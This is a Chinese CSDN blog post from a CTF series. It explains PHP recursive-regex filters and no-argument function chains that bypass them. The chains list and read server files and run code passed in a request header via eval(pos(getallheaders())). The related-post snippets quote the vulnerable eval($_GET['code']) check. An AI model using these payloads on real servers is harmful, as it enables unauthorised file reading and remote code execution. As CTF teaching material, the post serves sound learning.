php递归匹配以及无参数文件读取

最新推荐文章于 2022-05-11 14:12:56 发布
最新推荐文章于 2022-05-11 14:12:56 发布
阅读量242 收藏
点赞数 1
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sacrifice_li/article/details/108934140
版权

1.
php正则匹配-递归匹配
例如:
preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])

其中[^\W]+ 表示任意的字符和数字以及下划线,匹配1次或者多次
然后是匹配 "(" 一次
然后是(?R)? 表示递归匹配 也就是表示当前的正则匹配pattern这整个式子,(?R)代表的是整个式子,而最后一个?表示的是给予这个递归一个终止信号,因为?可以表示0次或者1次,所以同样可以用*来代替。当然这里?以及*可能出现递归栈的不同。

综上所述:该正则可以匹配的内容为:a(b(c()))或者a(),也就是只能含有括号的内容

2.该方法也就是无参数函数进行文件读取或者命令执行(参考自FreeBuff.COM----合天智汇)
①查看当前目录文件名
使用print_r(scandir('.')),那么如何构造".",有如下几种方案
一、localeconv()函数
该函数可以返回包含本地数字及货币格式信息的数组,而所有数组中第一项就是“.”,第二项是“..”
二、current() 或者pos()函数
这两者函数互为别称,这个函数的作用是返回数组中的单元,默认取第一个值
三、reset()函数
该函数返回数组的第一个单元的值,如果数组为空则返回FALSE
四、chr(46)
可以构造chr(current(localtime(time())));
五、利用三角函数以及可能出现的数字
phpversion()
phpversion()返回PHP版本,如5.5.9
floor(phpversion())返回 5
sqrt(floor(phpversion()))返回2.2360679774998
tan(floor(sqrt(floor(phpversion()))))返回-2.1850398632615
cosh(tan(floor(sqrt(floor(phpversion())))))返回4.5017381103491
sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))返回45.081318677156
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))返回46
即chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))返回"."

六、可以利用getcwd()或者realpath('.')来获得当前绝对路径
即print_r(scandir(getcwd()))

所以可以根据如上函数构造读取当前目录内容:
即print_r(scandir(current(localeconv())));

②读取当前目录下文件内容:
current()-返回数组中当前单元
each()----返回数组中当前的键/值对并将数组指针向前移动一步
end()-----将数组的内部指针指向最后一个单元
next()-----将数组中的内部指针向前移动一位
prev()-----将数组的内部指针倒回一位

所以就可以根据这些来读取文件内容了:
如果是获取数组的最后一个,可以采用show_source(end(scandir(getcwd())));或者是用readfile,highlight_file、file_get_contents、readgzfile

③array_reverse()函数
该函数以相反的元素顺序返回数组,如果排在最后一位那么使用了该函数之后便可以使用current函数来直接读取内容,同理如果是倒数第二个可以采用倒序然后再next来读取文件内容
即show_source(next(array_reverse(scandir(getcwd()))));

④如果不是倒数第一或者倒数第二,即数组内容较大的话,可以采用array_rand(array_filp)
其中array_file()是交换数组的键值对,array_rand()是随机选择一个返回
即采用show_source(array_rand(array_filp(scandir(getcwd()))));来凭运气

⑤dirname()函数
返回路径中的目录部分

⑥当我们需要在上一级目录读取文件的时候需要用到chdir()函数
该函数的作用是改变工作目录
即show_source(array_rand(array_filp(scandir(dirname(chdir(dirname(getcwd())))))))

⑦无参数命令执行
可以在headers输入一个参数,然后利用getallheaders()或者apache_request_headers()获取头部header
然后利用?eval(pos(getallheaders()));add:phpinfo()来进行命令的执行,首先要确定这个add排在headers的第一位

同理,可以用get_defined_vars()来获取php中的变量

 

参考文章:

https://www.freebuf.com/articles/system/242482.html--合天智汇

Sacrifice_li
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php递归读取目录及文件的方法
10-24
主要介绍了php递归读取目录及文件的方法,是非常经典的递归算法,涉及php操作文件及目录的技巧,需要的朋友可以参考下
无参rce
最新发布
m0_74317362的博客
11-07 73
​ 最近参加了两个CTF比赛,都遇到了无参数RCE的问题。第一次遇到虽然没解出来,但是为第二次比赛遇到做了基础铺垫,第二次也迎刃而解,同时这次比赛也学到了很多fuzz的方法和思路,在这里做个总结。
php参数文件下载,php rce之无参数文件
weixin_30332669的博客
03-09 204
一、什么是无参数?就是使用函数的时候不能带有参数。可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c'),不能带参数所以我们要使用无参数的函数进行文件读取或者命令执行。二、无参数文件读取查看当前目录文件名通常,可以使用print_r(scandir('.'))查看当前目录下所有文件,以数组的形式输出。但是要怎么构造参数里这个点呢。current() 返回数组中的...
参数RCE
m0_62422842的博客
05-11 1431
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
php参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 490
前言最近做了一些 php参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
php参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1828
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
PHP递归获取目录内所有文件的实现方法
12-18
* 递归获取文件夹内所有文件 * 返回一个TREE结构的文件系统 * @param string $dir * @param array $filter * @return array $files */ function scan_dir($dir, $filter = array()){ if(!is_dir($dir))...
php递归删除目录与文件的方法
12-19
本文实例讲述了php递归删除目录与文件的方法。分享给大家供大家参考。具体实现方法如下: <?php function deldir($path){ $dh = opendir($path); var_dump(readdir($dh)); while(($d = readdir($dh)) !== ...
PHP递归遍历指定文件夹内的文件实现方法
12-19
今天早上在地铁上看了关于文件文件夹的一章,正好最近刚搞懂linux的文件系统,觉得对文件属性的访问跟Shell命令很像,所以想晚上来实践一下。 发现php文件夹函数好像没有提供遍历文件夹下的所有文件(包括子目录...
关于PHP正则中递归匹配的使用
a121626608的专栏
01-19 635
PHP正则使用起来还是非常方便的,尤其是对需要抓取网页数据来处理的人来说, 对html数据,因为html结构的随意性非常大,因此有许多标签嵌套, 在.NET中有平衡组可以匹配,在PHP中就只有递归了。 研究了下递归匹配的使用方法,分享一个用递归匹配HTML中所有div内容数据的正则,按需求改成别的标签名也可以; $data = <<<EOF 第一层第一个div 第一层第二个d
php 让函数的参数可有可无(可以不传递参数)
01-08
前言 正常情况下,函数一旦声明参数,调用时就必须传入,否则会报错: function demo($e){ return $e; } echo demo(); // Uncaught ArgumentCountError: Too few arguments to function xxxx() 那么如何实现 想传参就传,不想传就不传呢? 实现 很简单,只需要 将形参指定默认值为空即可,下面给出一个演示: function demo($e = ''){ return $e; } echo demo();// echo demo('hello, world!');//hello,
php参数函数利用
L1ni01
10-24 1792
php参数函数利用 1.我们先看一道题目 无参数的意思可以是a()、a(b())或a(b(c())),但不能是a(‘b’)或a(‘b’,‘c’),不能带参数 由 题目中的正则我们可以发现,我们无法写参数进去,只能用 a(b(c())) 这种方式进行rce,这题过滤的是中文 的 () 所以不要多想。(出题人的小技巧,哈哈) 介绍无参数函数绕过所需要利用的函数 方法1:getenv() 查阅php手册,有非常多的超全局变量 $GLOBALS $_SERVER $_GET $_POST $_FILES $_
PHP无参函数
Flynn的博客
04-18 638
eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); }
php参数函数实现rce,无参数文件和RCE总结
weixin_28759987的博客
04-02 705
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
参数文件和RCE总结
合天网安学院
07-06 2559
引言代码解析无参数任意文件读取查看当前目录文件读取当前目录文件查看上一级目录文件读取上级目录文件查看和读取多层上级路径的就不写了,一样的方式套娃就行查看和读取根目录文件参数命令执行...
浅析PHP正则表达式的利用技巧
xiaoi123的博客
12-20 518
浅析PHP正则表达式的利用技巧 正则表达式是什么 正则表达式(regular expression)描述了一种字符串匹配的模式(pattern),可以用来检查一个串是否含有某种子串、 将匹配的子串替换或者从某个串中取出符合某个条件的子串等。包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为"元字符")。 另外正则引擎主要可以分为基本不同的两大类:一种是DFA(确定性有穷自动机),...
几种常见的字符串匹配算法之PHP代码简释二
smm188的博客
11-17 169
Trie树之PHP代码简释
参数文件读取
cosmoslin的博客
09-14 258
参数文件读取 什么是无参数? 顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等。 举个例子: a(b(c()));可以使用,但是a(‘b’)或者a(‘b’,‘c’)这种含有参数的都不能使用 所以我们要使用无参数的函数进行文件读取或者命令执行。 首先,print_r(scandir(’.’))可以用于可以用来查看当前目录所有文件名。那么要做到无参数,就要构造替代 ‘.’ 。 常见方法: locale
grep递归目录文件查找关键字,使用什么参数
06-09
递归地在目录中查找关键字,可以使用`-r`或`-R`参数。这两个参数都表示递归查找,不同之处在于处理符号链接的方式不同。 具体来说,`-r`参数会跟随符号链接,而`-R`参数则不会。如果要查找符号链接指向的文件中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值